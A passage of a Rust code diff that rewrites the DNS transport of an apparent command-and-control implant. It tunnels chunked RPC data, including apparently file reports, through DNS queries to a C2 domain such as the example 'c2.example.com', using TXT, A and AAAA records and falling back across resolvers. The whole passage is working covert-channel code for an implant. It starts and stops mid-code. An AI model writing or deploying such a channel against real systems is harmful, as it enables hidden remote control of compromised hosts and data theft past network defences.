DNS server in order + let mut last_error = None; + for attempt in 0..self.dns_servers.len() { + let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); + let server = &self.dns_servers[server_idx]; - // Split into DNS labels - let mut labels = Vec::new(); - for chunk in encoded_packet.as_bytes().chunks(MAX_LABEL_LENGTH) { - labels.push(String::from_utf8_lossy(chunk).to_string()); + match self.try_dns_query(server, &query).await { + Ok(response) => { + // Update current server on success + self.current_server_index = server_idx; + return Ok(response); + } + Err(e) => { + last_error = Some(e); + // Continue to next resolver + } + } } - Ok(labels.join(".")) + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("All DNS servers failed"))) } - /// Build a DNS query for the specified record type - fn build_dns_query(&self, subdomain: &str, transaction_id: u16, record_type: u16) -> Vec { + /// Try a single DNS query against a specific server + async fn try_dns_query(&self, server: &str, query: &[u8]) -> Result> { + // Create UDP socket with timeout + let socket = UdpSocket::bind("0.0.0.0:0").await?; + socket.connect(server).await?; + + // Send query + socket.send(query).await?; + + // Receive response with timeout + let mut buf = vec![0u8; 4096]; + let timeout_duration = std::time::Duration::from_secs(5); + let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) + .await + .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; + buf.truncate(len); + + // Parse TXT record from response + self.parse_dns_response(&buf) + } + + /// Build DNS query packet + fn build_dns_query(&self, domain: &str) -> Result> { let mut query = Vec::new(); - // DNS Header (12 bytes) - query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID - query.extend_from_slice(&DNS_QUERY_FLAG_STANDARD); // Flags: Standard query - query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 - query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 - query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 - query.extend_from_slice(&[0x00, 0x00]); // Additional RRs: 0 + // Transaction ID + query.extend_from_slice(&[0x12, 0x34]); + // Flags: standard query + query.extend_from_slice(&[0x01, 0x00]); + // Questions: 1 + query.extend_from_slice(&[0x00, 0x01]); + // Answer RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Authority RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); + // Additional RRs: 0 + query.extend_from_slice(&[0x00, 0x00]); // Question section - let fqdn = format!("{}.{}", subdomain, self.base_domain); - for label in fqdn.split('.') { + for label in domain.split('.') { if label.is_empty() { continue; } query.push(label.len() as u8); query.extend_from_slice(label.as_bytes()); } - query.push(0x00); // End of domain name + query.push(0x00); // End of domain - query.extend_from_slice(&record_type.to_be_bytes()); // Type: TXT/A/AAAA - query.extend_from_slice(&DNS_CLASS_IN.to_be_bytes()); // Class: IN + // Type and Class based on record_type + match self.record_type { + DnsRecordType::TXT => { + // Type: TXT (16) + query.extend_from_slice(&[0x00, 0x10]); + } + DnsRecordType::A => { + // Type: A (1) + query.extend_from_slice(&[0x00, 0x01]); + } + DnsRecordType::AAAA => { + // Type: AAAA (28) + query.extend_from_slice(&[0x00, 0x1c]); + } + } + // Class: IN (1) + query.extend_from_slice(&[0x00, 0x01]); - query + Ok(query) } - /// Parse a DNS response and extract record data (TXT, A, or AAAA) + /// Parse DNS response based on record type fn parse_dns_response(&self, response: &[u8]) -> Result> { - if response.len() < DNS_HEADER_SIZE { - return Err(anyhow::anyhow!("Response too short")); + if response.len() < 12 { + return Err(anyhow::anyhow!("DNS response too short")); } - // Parse header - let answer_count = u16::from_be_bytes([response[6], response[7]]); - if answer_count == 0 { - return Ok(Vec::new()); // Empty response - } + // Read answer count from header + let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize; - // Skip question section - let mut offset = DNS_HEADER_SIZE; + // Skip to answer section + let mut offset = 12; - // Parse domain name in question + // Skip question section while offset < response.len() && response[offset] != 0 { let len = response[offset] as usize; - if len == 0 || offset + len >= response.len() { - break; - } - offset += 1 + len; + offset += len + 1; } - offset += 1; // Skip null terminator - offset += 4; // Skip QTYPE and QCLASS + offset += 5; // Skip null terminator, type, and class - // Parse answer section - let mut record_data = Vec::new(); + // Parse all answer records and concatenate data + let mut all_data = Vec::new(); for _ in 0..answer_count { - if offset + 12 > response.len() { - break; - } - - // Skip name (with compression support) - while offset < response.len() { - let b = response[offset]; - if b == 0 { - offset += 1; - break; - } else if (b & DNS_COMPRESSION_PTR_MASK) == DNS_COMPRESSION_PTR_MASK { - // Pointer - offset += 2; - break; - } else { - offset += 1 + (b as usize); - } - } - if offset + 10 > response.len() { - break; - } - - let rtype = u16::from_be_bytes([response[offset], response[offset + 1]]); - offset += 8; // Skip TYPE, CLASS, TTL - let rdlength = u16::from_be_bytes([response[offset], response[offset + 1]]); - offset += 2; - - if rtype == TXT_RECORD_TYPE { - // TXT record - extract text data - let rdata_end = offset + rdlength as usize; - while offset < rdata_end && offset < response.len() { - let txt_len = response[offset] as usize; - offset += 1; - if offset + txt_len <= response.len() && offset + txt_len <= rdata_end { - record_data.extend_from_slice(&response[offset..offset + txt_len]); - offset += txt_len; - } else { - break; - } - } - } else if rtype == A_RECORD_TYPE || rtype == AAAA_RECORD_TYPE { - // A or AAAA record - extract IP address bytes - if offset + rdlength as usize <= response.len() { - record_data.extend_from_slice(&response[offset..offset + rdlength as usize]); - offset += rdlength as usize; - } - } else { - offset += rdlength as usize; + return Err(anyhow::anyhow!("Invalid DNS response format")); } - } - Ok(record_data) - } - - /// Send a single DNS query and receive response, with record type fallback - /// and resolver fallback (when using system resolvers) - async fn send_query(&mut self, subdomain: &str) -> Result> { - use rand::Rng; + // Skip name (2 bytes pointer), type (2), class (2), TTL (4) + offset += 10; - let socket = self - .socket - .as_ref() - .ok_or_else(|| anyhow::anyhow!("Socket not initialized"))?; - - // Determine which record types to try - let record_types_to_try: Vec = if self.enable_fallback { - // Try all record types in priority order, but start with preferred - let mut types = Vec::new(); - types.push(self.preferred_record_type); - for &rt in RECORD_TYPE_PRIORITY { - if rt != self.preferred_record_type { - types.push(rt); - } - } - types - } else { - // Only try the preferred record type - vec![self.preferred_record_type] - }; + // Read data length + let data_len = u16::from_be_bytes([response[offset], response[offset + 1]]) as usize; + offset += 2; - // Try each record type - for &record_type in &record_types_to_try { - #[cfg(debug_assertions)] - { - let type_name = match record_type { - TXT_RECORD_TYPE => "TXT", - A_RECORD_TYPE => "A", - AAAA_RECORD_TYPE => "AAAA", - _ => "UNKNOWN", - }; - log::trace!("Attempting DNS query with record type: {}", type_name); + if offset + data_len > response.len() { + return Err(anyhow::anyhow!("Invalid DNS record length")); } - // If using system resolver, try all resolvers in the array - // If using explicit server, only try that one - let resolvers_to_try: Vec = if let Some(ref server) = self.dns_server { - // Explicit DNS server specified - vec![server.clone()] - } else { - // Use resolver array (system + fallbacks) - if self.dns_resolvers.is_empty() { - return Err(anyhow::anyhow!("No DNS resolvers available")); - } - - // Try all resolvers starting from current index - let mut resolvers = Vec::new(); - for i in 0..self.dns_resolvers.len() { - let idx = (self.current_resolver_index + i) % self.dns_resolvers.len(); - resolvers.push(self.dns_resolvers[idx].clone()); - } - resolvers - }; - - // Try each resolver - for (resolver_attempt, target) in resolvers_to_try.iter().enumerate() { - #[cfg(debug_assertions)] - log::trace!( - "Attempting query to resolver {} (attempt {}/{})", - target, - resolver_attempt + 1, - resolvers_to_try.len() - ); - - // Generate random transaction ID - let transaction_id: u16 = rand::thread_rng().gen(); - let query = self.build_dns_query(subdomain, transaction_id, record_type); - - // Send query - match socket.send_to(&query, target).await { - Ok(_) => {} - Err(_e) => { - #[cfg(debug_assertions)] - log::trace!("Failed to send query to {}: {}", target, _e); - - // If using resolver array, advance to next resolver - if self.dns_server.is_none() && !self.dns_resolvers.is_empty() { - self.current_resolver_index = - (self.current_resolver_index + 1) % self.dns_resolvers.len(); - } - continue; // Try next resolver - } - } - - // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() - + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); - let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; - let mut timed_out = false; - - loop { - let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); - if remaining.is_zero() { - // Timeout - try next resolver or record type - timed_out = true; - break; - } - - match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { - Ok(Ok((len, _))) => { - // Check if transaction ID matches - if len >= 2 { - let response_id = u16::from_be_bytes([buf[0], buf[1]]); - if response_id == transaction_id { - // Check for DNS error (RCODE in flags) - if len >= 4 { - let rcode = buf[3] & DNS_RCODE_MASK; // Last 4 bits of flags - if rcode != 0 { - // DNS error response - try next resolver - #[cfg(debug_assertions)] - log::trace!( - "DNS error response from {}, RCODE={}", - target, - rcode - ); - break; - } - } - - // Matching response found - match self.parse_dns_response(&buf[..len]) { - Ok(data) => { - // Accept both empty and non-empty responses - // (data packets return empty ACK, others return data) - self.current_record_type = record_type; - - #[cfg(debug_assertions)] - log::trace!("Successful response from {}", target); - - return Ok(data); - } - Err(_e) => { - #[cfg(debug_assertions)] - log::trace!( - "Failed to parse response from {}: {}", - target, - _e - ); - break; - } - } - } - // Wrong transaction ID - keep waiting for the right one - #[cfg(debug_assertions)] - log::trace!( - "Ignoring DNS response with mismatched transaction ID: expected {}, got {}", - transaction_id, - response_id - ); - } - } - Ok(Err(_e)) => { - #[cfg(debug_assertions)] - log::trace!("Failed to receive response from {}: {}", target, _e); - break; // Try next resolver - } - Err(_) => { - // Timeout - try next resolver - timed_out = true; + // Parse based on record type + match self.record_type { + DnsRecordType::TXT => { + // TXT records have length-prefixed strings + let mut txt_offset = offset; + while txt_offset < offset + data_len { + let str_len = response[txt_offset] as usize; + txt_offset += 1; + if txt_offset + str_len > offset + data_len { break; } + all_data.extend_from_slice(&response[txt_offset..txt_offset + str_len]); + txt_offset += str_len; } } - - // If we timed out or got an error, advance to next resolver in array - if (timed_out || resolver_attempt < resolvers_to_try.len() - 1) - && self.dns_server.is_none() - && !self.dns_resolvers.is_empty() - { - self.current_resolver_index = - (self.current_resolver_index + 1) % self.dns_resolvers.len(); - - #[cfg(debug_assertions)] - log::trace!( - "Moving to next resolver, now at index {}", - self.current_resolver_index - ); - } - } - } - - // All record types and resolvers failed - Err(anyhow::anyhow!("All DNS record types and resolvers failed")) - } - - /// Send init packet and receive conversation ID from server - /// Init payload: [method_code:2][total_chunks:5][crc:4] - async fn send_init( - &mut self, - method: &str, - total_chunks: usize, - data_crc: u16, - ) -> Result { - let method_code = method_to_code(method); - let temp_conv_id = Self::generate_conv_id(); - - let total_chunks_encoded = Self::encode_seq(total_chunks); - let crc_encoded = Self::encode_base36_crc(data_crc); - let init_payload = format!("{}{}{}", method_code, total_chunks_encoded, crc_encoded); - - #[cfg(debug_assertions)] - log::debug!( - "send_init: method={}, total_chunks={}, total_chunks_encoded={}, crc={}, crc_encoded={}, init_payload={}", - method, - total_chunks, - total_chunks_encoded, - data_crc, - crc_encoded, - init_payload - ); - - let subdomain = Self::build_init_packet(&temp_conv_id, &init_payload)?; - - #[cfg(debug_assertions)] - log::debug!("Init packet subdomain: {}.{}", subdomain, self.base_domain); - - for attempt in 0..MAX_RETRIES { - #[cfg(debug_assertions)] - log::debug!( - "Sending init packet, attempt {}/{}, timeout={}s", - attempt + 1, - MAX_RETRIES, - INIT_TIMEOUT_SECS - ); - - match tokio::time::timeout( - tokio::time::Duration::from_secs(INIT_TIMEOUT_SECS), - self.send_query(&subdomain), - ) - .await - { - Ok(Ok(response)) if !response.is_empty() => { - // Check if response is binary chunked indicator - if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { - // Binary chunked indicator format (for A records): - // Byte 0: 0xFF (magic) - // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints - let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; - let crc_low = response[3]; - - #[cfg(debug_assertions)] - log::debug!( - "Init response is chunked (binary format), chunks={}, crc_low={}", - total_chunks, - crc_low - ); - - // Fetch conversation ID chunks using temp conv_id - // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking - let conv_id = self - .fetch_response_chunks(&temp_conv_id, total_chunks, crc_low as u16) - .await?; - - let conv_id_str = String::from_utf8_lossy(&conv_id).to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received chunked conversation ID: {}", conv_id_str); - - return Ok(conv_id_str); - } - - let response_str = String::from_utf8_lossy(&response).to_string(); - - // Check if response is text chunked indicator - if response_str.starts_with(RESP_CHUNKED) { - // Chunked conversation ID response (for A/AAAA records) - #[cfg(debug_assertions)] - log::debug!("Init response is chunked, parsing metadata"); - - let chunked_info = &response_str[RESP_CHUNKED.len()..]; - let parts: Vec<&str> = chunked_info.split(':').collect(); - - // Check if we have a complete chunked indicator (should have 2 parts: chunks and crc) - if parts.len() != 2 || parts[0].is_empty() || parts[1].is_empty() { - // Incomplete chunked indicator - this can happen with A records - // The indicator itself was truncated, so we need to fetch it - #[cfg(debug_assertions)] - log::debug!("Chunked indicator truncated, response: '{}', fetching full metadata", response_str); - - // For A/AAAA records, the chunked indicator might be split across multiple queries - // We need to piece together the full indicator by making fetch queries - // Use a special approach: concatenate responses until we have valid format - let mut full_indicator = response_str.clone(); - let mut fetch_seq = 0; - - // Try up to MAX_CHUNKED_INDICATOR_FETCHES to get the full indicator - while fetch_seq < MAX_CHUNKED_INDICATOR_FETCHES { - let subdomain = - self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; - match self.send_query(&subdomain).await { - Ok(chunk_data) if !chunk_data.is_empty() => { - full_indicator - .push_str(&String::from_utf8_lossy(&chunk_data)); - - // Try to parse again - if let Some(chunked_start) = - full_indicator.find(RESP_CHUNKED) - { - let info = &full_indicator - [chunked_start + RESP_CHUNKED.len()..]; - let parts: Vec<&str> = info.split(':').collect(); - if parts.len() >= 2 - && !parts[0].is_empty() - && !parts[1].is_empty() - { - // We have a complete indicator now - match ( - Self::decode_seq(parts[0]), - Self::decode_seq(parts[1]), - ) { - (Ok(total_chunks), Ok(expected_crc)) => { - #[cfg(debug_assertions)] - log::debug!("Reconstructed full chunked indicator: chunks={}, crc={}", total_chunks, expected_crc); - - // Now fetch the actual conversation ID chunks - // Start from fetch_seq + 1 since we already consumed some fetches for metadata - let conv_id = self - .fetch_response_chunks( - &temp_conv_id, - total_chunks, - expected_crc as u16, - ) - .await?; - let conv_id_str = - String::from_utf8_lossy(&conv_id) - .to_string(); - - return Ok(conv_id_str); - } - _ => { - // Keep trying - } - } - } - } - - fetch_seq += 1; - } - _ => break, - } - } - - return Err(anyhow::anyhow!( - "Failed to reconstruct chunked indicator after {} fetches: {}", - fetch_seq, - full_indicator - )); - } - - let total_chunks = Self::decode_seq(parts[0])?; - let expected_crc = Self::decode_seq(parts[1])?; - - // Fetch conversation ID chunks using temp conv_id - let conv_id = self - .fetch_response_chunks(&temp_conv_id, total_chunks, expected_crc as u16) - .await?; - // Trim null bytes that may be padding from A/AAAA record responses - let conv_id_str = String::from_utf8_lossy(&conv_id) - .trim_end_matches('\0') - .to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received chunked conversation ID: {}", conv_id_str); - - return Ok(conv_id_str); - } else { - // Direct conversation ID response (single packet) - // For A/AAAA records, may have null padding - let trimmed = response_str.trim_end_matches('\0').to_string(); - - #[cfg(debug_assertions)] - log::debug!("Received conversation ID: {}", trimmed); - - return Ok(trimmed); - } - } - Ok(Ok(_)) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: server returned empty response", - attempt + 1 - ); - } - Ok(Err(_e)) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: send_query failed: {}", - attempt + 1, - _e - ); - } - Err(_) => { - #[cfg(debug_assertions)] - log::warn!( - "Init packet attempt {}: timeout after {}s", - attempt + 1, - INIT_TIMEOUT_SECS - ); + DnsRecordType::A | DnsRecordType::AAAA => { + // A records are 4 bytes, AAAA records are 16 bytes - append raw binary + all_data.extend_from_slice(&response[offset..offset + data_len]); } } - if attempt < MAX_RETRIES - 1 { - let delay = BACKOFF_BASE_SECS << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s - #[cfg(debug_assertions)] - log::debug!("Waiting {}s before retry...", delay); - tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; - } + offset += data_len; } - Err(anyhow::anyhow!( - "Failed to get conversation ID after {} retries", - MAX_RETRIES - )) - } - - async fn send_chunks( - &mut self, - conv_id: &str, - chunks: &[Vec], - total_chunks_declared: usize, - ) -> Result<()> { - for (idx, chunk) in chunks.iter().enumerate() { - // Don't send more chunks than declared in init - if idx >= total_chunks_declared { - #[cfg(debug_assertions)] - log::error!( - "BUG: Attempted to send chunk {} but only declared {} chunks in init packet", - idx, - total_chunks_declared - ); - break; + // For A/AAAA records, data is base32-encoded text that needs decoding + if matches!(self.record_type, DnsRecordType::A | DnsRecordType::AAAA) { + // Trim null bytes from padding in A/AAAA records + while all_data.last() == Some(&0) { + all_data.pop(); } - let subdomain = self.build_packet(TYPE_DATA, idx, conv_id, chunk)?; - self.send_query(&subdomain).await?; + let encoded_str = String::from_utf8(all_data) + .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; + all_data = base32::decode(base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase()) + .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; } - Ok(()) + Ok(all_data) } - /// Send end packet and get server response - async fn send_end(&mut self, conv_id: &str, last_seq: usize) -> Result> { - let subdomain = self.build_packet(TYPE_END, last_seq, conv_id, &[])?; - - for attempt in 0..MAX_RETRIES { - #[cfg(debug_assertions)] - log::debug!( - "Sending end packet, attempt {}/{}", - attempt + 1, - MAX_RETRIES - ); - - match tokio::time::timeout( - tokio::time::Duration::from_secs(CHUNK_TIMEOUT_SECS), - self.send_query(&subdomain), - ) - .await - { - Ok(Ok(response)) if !response.is_empty() => { - return Ok(response); - } - _ => { - if attempt < MAX_RETRIES - 1 { - tokio::time::sleep(tokio::time::Duration::from_secs( - BACKOFF_RETRY_DELAY_SECS, - )) - .await; - } - } - } - } + /// Send request and receive response using DNS protocol + async fn dns_exchange(&mut self, request: Req, method_code: &str) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + // Marshal request + let request_data = Self::marshal_with_codec::(request)?; - Err(anyhow::anyhow!( - "Failed to get server response after {} retries", - MAX_RETRIES - )) + // Send raw bytes and unmarshal response + let response_data = self.dns_exchange_raw(request_data, method_code).await?; + Self::unmarshal_with_codec::(&response_data) } - /// Parse server response and handle missing chunks - async fn handle_response( - &mut self, - conv_id: &str, - response: &[u8], - chunks: &[Vec], - retry_count: usize, - ) -> Result> { - // Check if response is binary chunked indicator - if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { - // Binary chunked indicator format (for A records): - // Byte 0: 0xFF (magic) - // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints - let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; - let crc_low = response[3]; - - #[cfg(debug_assertions)] - log::debug!( - "Response is chunked (binary format), chunks={}, crc_low={}", - total_chunks, - crc_low - ); - - // Fetch all response chunks - // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking - let data = self - .fetch_response_chunks(conv_id, total_chunks, crc_low as u16) - .await?; - - return Ok(data); - } - - let response_str = String::from_utf8_lossy(response); - - // Check response type - if response_str.starts_with(RESP_OK) { - // Success - decode response data - let response_data = &response_str[RESP_OK.len()..]; - return Self::decode_base32(response_data); - } else if response_str.starts_with(RESP_MISSING) { - if retry_count >= MAX_MISSING_CHUNK_RETRIES { - return Err(anyhow::anyhow!( - "Exceeded maximum retries ({}) for missing chunks", - MAX_MISSING_CHUNK_RETRIES - )); - } - - // Missing chunks - parse and resend - let missing_str = &response_str[RESP_MISSING.len()..]; - let missing_seqs: Result> = missing_str - .split(',') - .filter(|s| !s.is_empty()) - .map(|s| Self::decode_seq(s)) - .collect(); - - let missing_seqs = missing_seqs?; - - #[cfg(debug_assertions)] - log::debug!( - "Server reports {} missing chunks: {:?}", - missing_seqs.len(), - missing_seqs - ); - - // Resend missing chunks - for seq in &missing_seqs { - if *seq < chunks.len() { - let subdomain = self.build_packet(TYPE_DATA, *seq, conv_id, &chunks[*seq])?; - self.send_query(&subdomain).await?; - } else { - #[cfg(debug_assertions)] - log::warn!( - "Server requested chunk {} but we only have {} chunks", - seq, - chunks.len() - ); - } - } + /// Send raw request bytes and receive raw response bytes using DNS protocol + /// Used for streaming requests like report_file where data is pre-marshaled + async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { - // Small delay to let resent chunks arrive before sending end packet again - tokio::time::sleep(tokio::time::Duration::from_millis(MISSING_CHUNK_DELAY_MS)).await; + // Calculate chunk size based on DNS limits and base domain + let chunk_size = self.calculate_max_chunk_size(); - // Retry end packet - let last_seq = chunks.len().saturating_sub(1); - let response = self.send_end(conv_id, last_seq).await?; + // Generate conversation ID + let conv_id = Self::generate_conv_id(); + let total_chunks = (request_data.len() + chunk_size - 1) / chunk_size; + let data_crc = Self::calculate_crc32(&request_data); - // Recursive retry with incremented counter - return Box::pin(self.handle_response(conv_id, &response, chunks, retry_count + 1)) - .await; - } else if response_str.starts_with(RESP_CHUNKED) { - // Response is chunked - fetch all chunks - // For A/AAAA records, response may be padded with nulls - let chunked_info = response_str[RESP_CHUNKED.len()..].trim_end_matches('\0'); - let parts: Vec<&str> = chunked_info.split(':').collect(); + // Send INIT packet + let init_payload = InitPayload { + method_code: method_code.to_string(), + total_chunks: total_chunks as u32, + data_crc32: data_crc, + }; + let mut init_payload_bytes = Vec::new(); + init_payload.encode(&mut init_payload_bytes)?; + + let init_packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: conv_id.clone(), + data: init_payload_bytes, + crc32: 0, + }; - if parts.len() != 2 { - return Err(anyhow::anyhow!("Invalid chunked response format")); - } + self.send_packet(init_packet).await?; - let total_chunks = Self::decode_seq(parts[0])?; - let expected_crc = Self::decode_base36_crc(parts[1])?; - - #[cfg(debug_assertions)] - log::debug!( - "Response is chunked: {} chunks, CRC={}", - total_chunks, - expected_crc - ); - - // Fetch all response chunks - return self - .fetch_response_chunks(conv_id, total_chunks, expected_crc) - .await; - } else if response_str.starts_with(RESP_ERROR) { - return Err(anyhow::anyhow!("Server error: {}", response_str)); + // Send DATA packets + for (seq, chunk) in request_data.chunks(chunk_size).enumerate() { + let data_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: (seq + 1) as u32, + conversation_id: conv_id.clone(), + data: chunk.to_vec(), + crc32: Self::calculate_crc32(chunk), + }; + self.send_packet(data_packet).await?; } - Err(anyhow::anyhow!("Unknown server response")) - } + // Send END packet + let end_packet = DnsPacket { + r#type: PacketType::End.into(), + sequence: (total_chunks + 1) as u32, + conversation_id: conv_id.clone(), + data: vec![], + crc32: 0, + }; - /// Fetch chunked response from server - /// For binary (A/AAAA): expected_crc is low byte only (0-255) - /// For text (TXT): expected_crc is full 16-bit CRC - async fn fetch_response_chunks( - &mut self, - conv_id: &str, - total_chunks: usize, - expected_crc: u16, - ) -> Result> { - // TXT uses base32-encoded text, A/AAAA use raw bytes - let is_text_chunking = self.current_record_type == TXT_RECORD_TYPE; - - let mut encoded_response = String::new(); - let mut binary_response = Vec::new(); - - // Fetch each chunk - for seq in 0..total_chunks { - let subdomain = self.build_packet(TYPE_FETCH, seq, conv_id, &[])?; - let response = self.send_query(&subdomain).await?; - - if is_text_chunking { - // TXT records: response is "ok:" prefix + base32 data - let response_str = String::from_utf8_lossy(&response); - if !response_str.starts_with(RESP_OK) { + let end_response = self.send_packet(end_packet).await?; + + // Check if END response contains ResponseMetadata (chunked response indicator) + // ResponseMetadata is NOT encrypted - it's plain protobuf + // If response is just "ok", it's a small response and will be in first FETCH + // If response is protobuf metadata, we need multiple FETCHes + if end_response.len() > 2 && end_response != b"ok" { + // Try to parse as ResponseMetadata (plain protobuf, not encrypted) + if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { + // Response is chunked - fetch all chunks + let total_chunks = metadata.total_chunks as usize; + let expected_crc = metadata.data_crc32; + + // Fetch all encrypted response chunks and concatenate + let mut full_response = Vec::new(); + for chunk_idx in 0..total_chunks { + // Create FetchPayload with chunk index + let fetch_payload = FetchPayload { + chunk_index: chunk_idx as u32, + }; + let mut fetch_payload_bytes = Vec::new(); + fetch_payload.encode(&mut fetch_payload_bytes)?; + + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (total_chunks as u32 + 2 + chunk_idx as u32), + conversation_id: conv_id.clone(), + data: fetch_payload_bytes, + crc32: 0, + }; + + // Each chunk is encrypted - get raw chunk data + let chunk_data = self.send_packet(fetch_packet).await?; + full_response.extend_from_slice(&chunk_data); + } + + // Verify CRC of the complete encrypted response + let actual_crc = Self::calculate_crc32(&full_response); + if actual_crc != expected_crc { return Err(anyhow::anyhow!( - "Failed to fetch chunk {}: {}", - seq, - response_str + "Response CRC mismatch: expected {}, got {}", + expected_crc, + actual_crc )); } - let chunk_data = &response_str[RESP_OK.len()..]; - encoded_response.push_str(chunk_data); - } else { - // A/AAAA records: response is raw binary data (no prefix) - // Trim null bytes from AAAA padding (16-byte alignment) - let trimmed_end = response - .iter() - .rposition(|&b| b != 0) - .map(|i| i + 1) - .unwrap_or(0); - binary_response.extend_from_slice(&response[..trimmed_end]); - } - } - // Send final fetch to signal cleanup (seq = total_chunks) - let subdomain = self.build_packet(TYPE_FETCH, total_chunks, conv_id, &[])?; - let _ = self.send_query(&subdomain).await; // Ignore response - - #[cfg(debug_assertions)] - if is_text_chunking { - log::debug!( - "Fetched all {} chunks, total encoded size: {}", - total_chunks, - encoded_response.len() - ); - } else { - log::debug!( - "Fetched all {} chunks, total binary size: {}", - total_chunks, - binary_response.len() - ); + // Return the complete reassembled encrypted response data + return Ok(full_response); + } } - // Decode based on chunking type - let decoded = if is_text_chunking { - // TXT: Decode base32 - Self::decode_base32(&encoded_response)? - } else { - // A/AAAA: Already binary - binary_response - }; - - // Verify CRC - let actual_crc = Self::calculate_crc16(&decoded); - - // For binary chunking (A/AAAA), we only have the low byte of the CRC - // For text chunking (TXT), we have the full 16-bit CRC - let crc_match = if is_text_chunking { - actual_crc == expected_crc - } else { - (actual_crc & CRC16_LOW_BYTE_MASK) == (expected_crc & CRC16_LOW_BYTE_MASK) + // Single response (small enough to fit in one packet) + // Send FETCH packet to get response + let fetch_packet = DnsPacket { + r#type: PacketType::Fetch.into(), + sequence: (total_chunks + 2) as u32, + conversation_id: conv_id.clone(), + data: vec![], + crc32: 0, }; - if !crc_match { - return Err(anyhow::anyhow!( - "CRC mismatch on chunked response: expected {}, got {} (low byte check: {})", - expected_crc, - actual_crc, - if is_text_chunking { - "full" - } else { - "low byte only" - } - )); - } - - #[cfg(debug_assertions)] - log::debug!( - "Successfully reassembled chunked response, {} bytes", - decoded.len() - ); - - Ok(decoded) - } - - /// Perform a DNS-based RPC exchange - async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { - // Lazy initialize socket - if self.socket.is_none() { - let socket = UdpSocket::bind("0.0.0.0:0") - .await - .context("Failed to create UDP socket")?; - self.socket = Some(std::sync::Arc::new(socket)); - } - - // Calculate CRC16 of the data - let data_crc = Self::calculate_crc16(data); - - #[cfg(debug_assertions)] - log::debug!( - "DNS exchange: method={}, data_len={}, crc={}", - method, - data.len(), - data_crc - ); - - // Calculate max data size based on domain length - let max_data_size = self.calculate_max_data_size(); - - // Split RAW BINARY data into chunks (no base32 encoding yet) - let chunks: Vec> = data - .chunks(max_data_size) - .map(|chunk| chunk.to_vec()) - .collect(); - - let total_chunks = chunks.len(); - - #[cfg(debug_assertions)] - log::debug!( - "DNS exchange: chunks={}, max_data_size={}", - total_chunks, - max_data_size - ); - - // Step 1: Send init packet and get conversation ID - let conv_id = self.send_init(method, total_chunks, data_crc).await?; - - // Step 2: Send data chunks - self.send_chunks(&conv_id, &chunks, total_chunks).await?; + let final_response = self.send_packet(fetch_packet).await?; - // Step 3: Send end packet and get response - let last_seq = total_chunks.saturating_sub(1); - let response = self.send_end(&conv_id, last_seq).await?; - - // Step 4: Handle response (including retries for missing chunks) - self.handle_response(&conv_id, &response, &chunks, 0).await - } - - /// Perform a unary RPC call via DNS - async fn unary_rpc(&mut self, request: Req, path: &str) -> Result - where - Req: Message + Send + 'static, - Resp: Message + Default + Send + 'static, - { - // Marshal and encrypt request - let request_bytes = marshal_with_codec::(request)?; - - // Send via DNS - let response_bytes = self.dns_exchange(path, &request_bytes).await?; - - // Unmarshal and decrypt response - unmarshal_with_codec::(&response_bytes) + // Return raw response data + Ok(final_response) } } impl Transport for DNS { fn init() -> Self { DNS { - dns_server: None, - dns_resolvers: Vec::new(), - current_resolver_index: 0, base_domain: String::new(), - socket: None, - preferred_record_type: TXT_RECORD_TYPE, - current_record_type: TXT_RECORD_TYPE, - enable_fallback: true, + dns_servers: Vec::new(), + current_server_index: 0, + record_type: DnsRecordType::TXT, } } fn new(callback: String, _proxy_uri: Option) -> Result { - // URL format: dns:///[?type=TXT|A|AAAA&fallback=true|false] - // Examples: - // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback - // dns://*/c2.example.com?type=A - System resolver, prefer A records - // dns://*/c2.example.com?fallback=false - TXT only, no fallback - let url = callback.trim_start_matches(URL_SCHEME_PREFIX); - - // Split URL and query params - let (server_domain, query_params) = if let Some(idx) = url.find('?') { - (&url[..idx], Some(&url[idx + 1..])) + // Parse DNS URL formats: + // dns://server:port?domain=example.com&type=txt (single server, TXT records) + // dns://*?domain=example.com&type=a (use system DNS + fallbacks, 